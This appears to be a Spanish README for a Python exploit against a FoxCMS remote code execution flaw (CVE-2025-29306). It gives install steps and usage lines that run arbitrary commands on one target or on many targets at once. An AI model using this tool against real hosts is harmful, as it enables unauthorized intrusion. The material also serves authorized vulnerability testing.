
Prueba de concepto (PoC) para CVE-2025-29306, una vulnerabilidad de ejecución remota de código en FoxCMS. Este script de Python escanea objetivos únicos o múltiples, ejecuta comandos e informa los hosts vulnerables.
Un exploit en Python para CVE-2025-29306, una vulnerabilidad de ejecución remota de código en FoxCMS. Esta herramienta permite probar objetivos individuales o escanear múltiples hosts en masa.
git clone https://github.com/mattb709/CVE-2025-29306-PoC-FoxCMS-RCE
.git
cd CVE-2025-29306-PoC-FoxCMS-RCE
pip install -r requirements.txt
requestsbeautifulsoup4argparseInstale los requisitos con:
pip install requests beautifulsoup4
usage: foxcms_rce.py [-h] -c COMMAND (-t TARGET | -f TARGETS_FILE)
CVE-2025-29306 Exploit Checker
options:
-h, --help show this help message and exit
-c COMMAND, --command COMMAND
Command to execute on vulnerable hosts
-t TARGET, --target TARGET
Single target in the format ip:port
-f TARGETS_FILE, --targets-file TARGETS_FILE
File containing multiple targets, one per line, in the format ip:port
python CVE-2025-29306-PoC -t 192.168.1.100:8080 -c "whoami"
python CVE-2025-29306-PoC -f targets.txt -c "whoami"
python CVE-2025-29306-PoC -f targets.txt -c "whoami" > results.txt
El archivo de objetivos debe contener un objetivo por línea en el formato:
ip:port
Ejemplo:
192.168.1.100:80
10.10.10.5:443
172.16.32.15:8080
El script proporciona:
foxcms_rce_results.txt
Esta herramienta es solo para fines educativos y de pruebas autorizadas. El autor no se hace responsable por cualquier mal uso o daño causado por este programa.
Licencia MIT - Consulte el archivo LICENSE para más detalles.